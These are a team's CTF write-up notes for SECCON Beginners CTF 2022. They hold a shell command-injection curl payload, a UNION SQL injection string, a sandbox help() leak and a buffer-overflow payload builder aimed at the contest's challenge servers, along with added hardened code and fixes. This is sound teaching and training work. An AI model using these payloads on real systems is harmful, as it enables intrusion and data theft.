SECCON Beginners CTF 2022
===
## Schedule
From 2022/6/4 (Sat) 14:00 JST to 2022/6/5 (Sun) 14:00 JST
## Score server
https://score.beginners.azure.noc.seccon.jp/
### Flag format
The flag format is `ctf4b{[\x20-\x7e]+}`
## Challenges
---
### web
#### Util 藤島 (solved)
```bash=
# The "address" value is interpolated into a shell command line,
# so "&&" appends our own command after the ping.
curl -L -X POST https://util.quals.beginners.seccon.jp/util/ping \
-H "Content-Type: application/json" \
-d '{"address":"127.0.0.1 && cat /flag_*"}'
```
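The payload works because the `address` field reaches a shell unchanged, so `&&` hands control to `cat`. As an added example, not the challenge's own source (which is not on the page), here is that pattern in Python next to the fix: accept only an IP literal and exec an argv list so no shell ever parses the input. `echo pong` stands in for `ping -c 1` so the block runs offline.

```python
"""Command injection in a "ping" endpoint, vulnerable and hardened forms.

Added example; the challenge's real handler is not on the page and is assumed
to look like ping_vulnerable(). PING is a stand-in for "ping -c 1".
"""
import ipaddress
import subprocess

PING = "echo pong"  # stand-in for "ping -c 1": runs without a network


def ping_vulnerable(address: str) -> str:
    """Concatenates untrusted input into a shell command line.

    With address = "127.0.0.1 && cat /flag_*" the shell runs cat after ping.
    """
    proc = subprocess.run(f"{PING} {address}", shell=True,
                          capture_output=True, text=True, timeout=5)
    return proc.stdout


def is_ip_literal(address: str) -> bool:
    """True only for a syntactically valid IPv4/IPv6 address literal."""
    try:
        ipaddress.ip_address(address)
        return True
    except ValueError:
        return False


def ping_hardened(address: str) -> str:
    """Validate first, then exec an argv list: no shell, so no metacharacters."""
    if not is_ip_literal(address):
        raise ValueError(f"not an IP address: {address!r}")
    argv = PING.split() + [address]   # each element is one argv entry
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return proc.stdout


if __name__ == "__main__":
    payload = "127.0.0.1 && echo INJECTED"
    print(ping_vulnerable(payload))     # pong 127.0.0.1 / INJECTED
    print(ping_hardened("127.0.0.1"))   # pong 127.0.0.1
    print(is_ip_literal(payload))       # False
```

If the endpoint must also accept hostnames, keep the argv form and add an allowlist check (letters, digits, `-`, `.`) rather than trying to escape shell syntax; the validation is a defence-in-depth layer, the missing shell is the fix.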
#### textex 藤島 (abandoned)
#### gallery 藤島 (abandoned)
#### serial 藤島 林 (abandoned)
```php=
print("SELECT id, name, password_hash FROM users WHERE name = 'aaa' union select -1 as id, body as name, null as password_hash from FLAGS where name != '' LIMIT 1");
# I want to inject the union select into $user->name, but "'" gets escaped, so...
$sql = "SELECT id, name, password_hash FROM users WHERE name = '" . $user->name . "' LIMIT 1";
```
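What the union payload does to that query, and why escaping the quote stops it in a string context, as an added example in Python with SQLite rather than the challenge's PHP (the table layout, the flag value and the `''`-doubling escape are constructed; the escaping routine the challenge actually uses is not shown on the page). The parameterised query at the end is the real fix: the name never becomes part of the SQL text at all.

```python
"""UNION injection into a string literal: concatenation vs. escaping vs. parameters.

Added example; tables, rows and flag value are constructed for the demo.
"""
import sqlite3

# The injected value: closes the 'aaa' literal, appends a UNION that yields
# the flag body in the `name` column, and swallows the trailing quote.
PAYLOAD = ("aaa' union select -1 as id, body as name, null as password_hash "
           "from FLAGS where name != '")


def setup() -> sqlite3.Connection:
    """In-memory database shaped like the query suggests (constructed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, password_hash TEXT);
        CREATE TABLE FLAGS(name TEXT, body TEXT);
        INSERT INTO users VALUES (1, 'admin', 'sha256$constructed');
        INSERT INTO FLAGS VALUES ('flag', 'ctf4b{constructed_example}');
    """)
    return db


def lookup_concat(db, name):
    """The vulnerable pattern from the challenge: name is spliced into SQL text."""
    sql = ("SELECT id, name, password_hash FROM users WHERE name = '"
           + name + "' LIMIT 1")
    return db.execute(sql).fetchone()


def escape_quotes(s: str) -> str:
    """Standard SQL escaping: double every single quote (the challenge's exact
    escaping function is not on the page; this is an assumption)."""
    return s.replace("'", "''")


def lookup_param(db, name):
    """Parameterised query: the driver sends name as data, never as SQL."""
    sql = "SELECT id, name, password_hash FROM users WHERE name = ? LIMIT 1"
    return db.execute(sql, (name,)).fetchone()


if __name__ == "__main__":
    db = setup()
    print(lookup_concat(db, PAYLOAD))                 # (-1, 'ctf4b{...}', None)
    print(lookup_concat(db, escape_quotes(PAYLOAD)))  # None: quote stays inside the literal
    print(lookup_param(db, PAYLOAD))                  # None
    print(lookup_param(db, "admin"))                  # (1, 'admin', 'sha256$constructed')
```

Escaping only protects the quoted-string context it was written for; a value that lands in a numeric position, an identifier, or a `LIMIT` clause is not helped by it, which is why parameters are preferred over escaping.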
#### Ironhand 藤島 (abandoned)
---
### misc
#### phisher 林 (abandoned)
```bash=
nc phisher.quals.beginners.seccon.jp 44322
```
#### H2 藤島 (solved)
```go=
if r.URL.Path == SECRET_PATH {
w.Header().Set("x-flag", "<secret>")
}
```
Open the pcap file in Wireshark.
Search with the display filter `http2.header.name == x-flag` (quote the value, `"x-flag"`, on older Wireshark versions that reject unquoted string literals).
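That filter matches header names Wireshark has already HPACK-decoded. As an added example (not from the write-up or the challenge), the following parses raw cleartext HTTP/2 (h2c) frames itself and decodes literal header fields carrying a new name, which is how a header outside the static table, such as `x-flag`, has to be sent the first time. Indexed names and Huffman-coded strings are reported rather than expanded, so a real capture may still need Wireshark's full HPACK state; the sample frames and the flag value are constructed. If the capture is HTTP/2 over TLS, neither approach sees headers without the session keys (SSLKEYLOGFILE).

```python
"""Find an HTTP/2 response header (e.g. x-flag) in a raw h2c byte stream.

Added example. Covers the 9-byte frame header (RFC 7540 s4.1), HEADERS frame
padding/priority fields, and HPACK literal fields (RFC 7541 s6.2) with a new
name. Indexed names/values and Huffman strings are flagged, not decoded.
"""
import struct

HEADERS_FRAME = 0x1
FLAG_END_HEADERS = 0x4
FLAG_PADDED = 0x8
FLAG_PRIORITY = 0x20
PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"


def hpack_int(buf, pos, prefix_bits):
    """Decode an HPACK integer with an N-bit prefix (RFC 7541 s5.1)."""
    mask = (1 << prefix_bits) - 1
    value = buf[pos] & mask
    pos += 1
    if value < mask:
        return value, pos
    shift = 0
    while True:                       # continuation bytes, 7 bits each
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def hpack_string(buf, pos):
    """Decode an HPACK string literal; Huffman-coded strings are only flagged."""
    huffman = bool(buf[pos] & 0x80)
    length, pos = hpack_int(buf, pos, 7)
    raw = buf[pos:pos + length]
    pos += length
    if huffman:
        return "<huffman:%d bytes>" % length, pos
    return raw.decode("latin-1"), pos


def decode_header_block(block):
    """Return (name, value) pairs from an HPACK header block fragment."""
    pos, fields = 0, []
    while pos < len(block):
        b = block[pos]
        if b & 0x80:                  # 1xxxxxxx: indexed name+value (table lookup)
            idx, pos = hpack_int(block, pos, 7)
            fields.append(("<indexed #%d>" % idx, ""))
            continue
        if b & 0x40:                  # 01xxxxxx: literal with incremental indexing
            prefix = 6
        elif b & 0x20:                # 001xxxxx: dynamic table size update
            _, pos = hpack_int(block, pos, 5)
            continue
        else:                         # 0000xxxx / 0001xxxx: literal, not indexed
            prefix = 4
        idx, pos = hpack_int(block, pos, prefix)
        if idx == 0:                  # new name follows as a string literal
            name, pos = hpack_string(block, pos)
        else:
            name = "<indexed name #%d>" % idx
        value, pos = hpack_string(block, pos)
        fields.append((name, value))
    return fields


def iter_frames(data):
    """Yield (type, flags, stream_id, payload) for each frame in a byte stream."""
    pos = len(PREFACE) if data.startswith(PREFACE) else 0
    while pos + 9 <= len(data):
        length = int.from_bytes(data[pos:pos + 3], "big")
        ftype, flags = data[pos + 3], data[pos + 4]
        stream_id = struct.unpack(">I", data[pos + 5:pos + 9])[0] & 0x7FFFFFFF
        yield ftype, flags, stream_id, data[pos + 9:pos + 9 + length]
        pos += 9 + length


def find_header(data, wanted):
    """Return [(stream_id, value)] for every HEADERS frame carrying `wanted`."""
    hits = []
    for ftype, flags, sid, payload in iter_frames(data):
        if ftype != HEADERS_FRAME:
            continue
        start, end = 0, len(payload)
        if flags & FLAG_PADDED:       # first byte is the pad length
            end -= payload[0]
            start += 1
        if flags & FLAG_PRIORITY:     # 4-byte dependency + 1-byte weight
            start += 5
        for name, value in decode_header_block(payload[start:end]):
            if name.lower() == wanted:
                hits.append((sid, value))
    return hits


def _literal(name, value):
    """Encode one literal-without-indexing field; used only to build sample data."""
    return b"\x00" + bytes([len(name)]) + name + bytes([len(value)]) + value


def _headers_frame(stream_id, fields):
    block = b"".join(_literal(n, v) for n, v in fields)
    return (len(block).to_bytes(3, "big") + bytes([HEADERS_FRAME, FLAG_END_HEADERS])
            + struct.pack(">I", stream_id) + block)


# Constructed sample: two responses, the secret path's one on stream 1.
SAMPLE = (PREFACE
          + _headers_frame(1, [(b":status", b"200"), (b"x-flag", b"ctf4b{constructed}")])
          + _headers_frame(3, [(b":status", b"404")]))

if __name__ == "__main__":
    print(find_header(SAMPLE, "x-flag"))   # [(1, 'ctf4b{constructed}')]
```

From the command line, `tshark -r capture.pcap -Y 'http2.header.name == "x-flag"' -T fields -e http2.header.value` gives the same answer without writing a parser, and handles the HPACK table state across frames that this example deliberately skips.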
#### ultra_super_miracle_validator
#### hitchhike4b 藤島 (abandoned)
```bash=
$ nc hitchhike4b.quals.beginners.seccon.jp 55433
```
```
help> __main__
Help on module __main__:

NAME
    __main__

DATA
    __annotations__ = {}
    flag1 = 'ctf4b{53cc0n_15_1n_m'

FILE
    /home/ctf/hitchhike4b/app_35f13ca33b0cc8c9e7d723b78627d39aceeac1fc.py
```
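Why `help> __main__` prints the flag: pydoc's module renderer lists every public module-level name in its DATA section, plain string constants included, and only hides names with a leading underscore (dunder names such as `__annotations__` are still shown). The following is an added example, not the challenge app; the module, its `flag1` value and the `_hidden` attribute are constructed.

```python
"""Show which module globals pydoc's help() exposes in its DATA section.

Added example. Builds a stand-in for the challenge's __main__ and renders it
the way help(__main__) does, then parses the DATA section back out.
"""
import pydoc
import types


def make_demo_module() -> types.ModuleType:
    """Constructed module: one public secret, one underscore-prefixed value."""
    mod = types.ModuleType("__main__")
    mod.flag1 = "ctf4b{constructed_part_1}"      # shown by help(): public name
    mod._hidden = "private by convention only"   # hidden by pydoc.visiblename
    return mod


def render_help(mod) -> str:
    """Same text the `help>` prompt prints for a module (plain, no overstrike)."""
    return pydoc.render_doc(mod, renderer=pydoc.plaintext)


def leaked_data(mod) -> dict:
    """Parse the DATA section of the rendered help into {name: repr_of_value}."""
    lines = iter(render_help(mod).splitlines())
    found = {}
    for line in lines:
        if line.strip() != "DATA":
            continue
        for entry in lines:             # entries are indented; a blank line ends them
            if not entry.startswith("    "):
                break
            name, _, value = entry.strip().partition(" = ")
            found[name] = value
    return found


if __name__ == "__main__":
    print(render_help(make_demo_module()))
    print(leaked_data(make_demo_module()))   # {'flag1': "'ctf4b{constructed_part_1}'"}
```

The lesson for a sandboxed interpreter is that `help()`, like `dir()` and `vars()`, is an introspection path out of the sandbox; a secret should not live in a reachable module global at all.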
---
### pwnable
#### BeginnersBof 藤島 (abandoned)
[Possibly useful reference](https://gist.github.com/matsubara0507/72dc50c89200a09f7c61)
[Possibly useful reference 2](https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/)
```bash=
$ python3 -c "print(960, 'A'*960, sep='\n')" > input.txt
$ gdb -q chall
```
```gdb
(gdb) run < input.txt
Starting program: /root/chall < input.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
How long is your name?
What's your name?
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401315 in main ()
```
```bash=
$ python3 -c "print(961, 'A'*961, sep='\n')" > input.txt
$ gdb -q chall
```
```gdb
(gdb) run < input.txt
Starting program: /root/chall < input.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
How long is your name?
What's your name?
Program received signal SIGSEGV, Segmentation fault.
_IO_fgets (buf=0x7fffffffec40 'A' <repeats 200 times>..., n=961, fp=0x7ffff7fa9aa0 <_IO_2_1_stdin_>) at ./libio/iofgets.c:60
60 ./libio/iofgets.c: No such file or directory.
```
```bash=
$ objdump -d chall
...
00000000004011e6 <win>:
4011e6: 55 push %rbp
4011e7: 48 89 e5 mov %rsp,%rbp
4011ea: 48 81 ec 10 01 00 00 sub $0x110,%rsp
4011f1: be 00 00 00 00 mov $0x0,%esi
4011f6: 48 8d 3d 07 0e 00 00 lea 0xe07(%rip),%rdi # 402004 <_IO_stdin_used+0x4>
4011fd: b8 00 00 00 00 mov $0x0,%eax
401202: e8 c9 fe ff ff call 4010d0 <open@plt>
401207: 89 45 fc mov %eax,-0x4(%rbp)
40120a: 83 7d fc ff cmpl $0xffffffff,-0x4(%rbp)
40120e: 75 16 jne 401226 <win+0x40>
401210: 48 8d 35 f6 0d 00 00 lea 0xdf6(%rip),%rsi # 40200d <_IO_stdin_used+0xd>
401217: bf 01 00 00 00 mov $0x1,%edi
40121c: b8 00 00 00 00 mov $0x0,%eax
401221: e8 7a fe ff ff call 4010a0 <err@plt>
401226: 48 8d 8d f0 fe ff ff lea -0x110(%rbp),%rcx
40122d: 8b 45 fc mov -0x4(%rbp),%eax
401230: ba 00 01 00 00 mov $0x100,%edx
401235: 48 89 ce mov %rcx,%rsi
401238: 89 c7 mov %eax,%edi
40123a: e8 41 fe ff ff call 401080 <read@plt>
40123f: 48 89 c2 mov %rax,%rdx
401242: 48 8d 85 f0 fe ff ff lea -0x110(%rbp),%rax
401249: 48 89 c6 mov %rax,%rsi
40124c: bf 01 00 00 00 mov $0x1,%edi
401251: e8 ea fd ff ff call 401040 <write@plt>
401256: 8b 45 fc mov -0x4(%rbp),%eax
401259: 89 c7 mov %eax,%edi
40125b: e8 10 fe ff ff call 401070 <close@plt>
401260: 90 nop
401261: c9 leave
401262: c3 ret
```
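The transcripts above show the overflow reaching main's saved return address (the fault at 0x401315, most likely main's `ret`, with an all-0x41 return value) but never measure the offset. As an added example, not the write-up's own solver, here is the standard way to get it and build the payload: send a De Bruijn pattern instead of `A`s, read the 8 bytes at `$rsp` when the `ret` faults, and look up where that 4-byte window sits in the pattern. It assumes what the transcript suggests, that the program reads a length line and then `fgets(name, length, stdin)`, and takes `win` from the objdump output (0x4011e6); the offset itself must come from the measurement, not from this page.

```python
"""Offset discovery with a De Bruijn pattern and payload building for BeginnersBof.

Added example; assumptions: length line first, then fgets(name, length, stdin),
win == 0x4011e6 (from objdump). The real offset is not on the page.
"""
import itertools
import struct

WIN = 0x4011E6            # 00000000004011e6 <win>
WIN_SKIP_PUSH = 0x4011E7  # "mov %rsp,%rbp": skips push %rbp to fix stack alignment
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def _de_bruijn(alphabet: bytes, k: int):
    """Yield B(len(alphabet), k) byte by byte (FKM algorithm)."""
    n = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > k:
            if k % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, n):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(n: int, k: int = 4) -> bytes:
    """First n bytes of the pattern; every k-byte window is unique."""
    if n > len(ALPHABET) ** k:
        raise ValueError("pattern longer than one De Bruijn period")
    return bytes(itertools.islice(_de_bruijn(ALPHABET, k), n))


def cyclic_find(value, k: int = 4, maxlen: int = 0x10000) -> int:
    """Offset of a k-byte window; accepts bytes or the faulting register value."""
    if isinstance(value, int):
        needle = struct.pack("<Q", value)[:k]   # low k bytes, little-endian
    else:
        needle = bytes(value)[:k]
    return cyclic(maxlen, k).find(needle)


def build_payload(offset: int, target: int = WIN) -> bytes:
    """Length line, then offset filler bytes and the return address.

    fgets(buf, n, stdin) stores at most n-1 bytes, so the declared length is
    one more than the name we send; the trailing newline ends the read.
    """
    name = b"A" * offset + struct.pack("<Q", target)
    return str(len(name) + 1).encode() + b"\n" + name + b"\n"


if __name__ == "__main__":
    # Step 1: send this instead of 'A'*960 and note the 8 bytes at $rsp on the fault.
    open("input.txt", "wb").write(b"961\n" + cyclic(960) + b"\n")
    # Step 2: with the faulting value from gdb (e.g. 0x6161616261616161 = "aaaabaaa"):
    print(cyclic_find(0x6161616261616161))     # 0
    # Step 3: once the offset is known, build the real input.
    print(build_payload(8)[:3])                 # b'17\n'
```

If the jump lands in `win` but the process dies on an SSE instruction inside `open`/`err`, the stack is 8 bytes off 16-byte alignment because `win` was reached by `ret` rather than `call`; returning to `WIN_SKIP_PUSH` (the `mov %rsp,%rbp` right after `push %rbp`) is the usual one-byte fix.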
#### raindrop
#### simplelist
#### snowdrop
#### Monkey Heap
---
### reversing
#### Quiz (solved)
#### WinTLS
#### Recursive
#### Ransom
#### please_not_debug_me
---
### crypto
#### omni-rsa
#### Unpredictable pad
#### Command 林
```
Encrypted command fizzbuzz = c549dbc31ae7232c2bf290d97abed3e461e018f0959d1246d79c8f1ae9800d0c
Encrypted command primes = bc9a5c6d8a71384a04c8dedb177197bce98d4d8d7bfa9284bb778cb9ef7d1d33
```
#### Prime party
#### Coughing Fox (solved)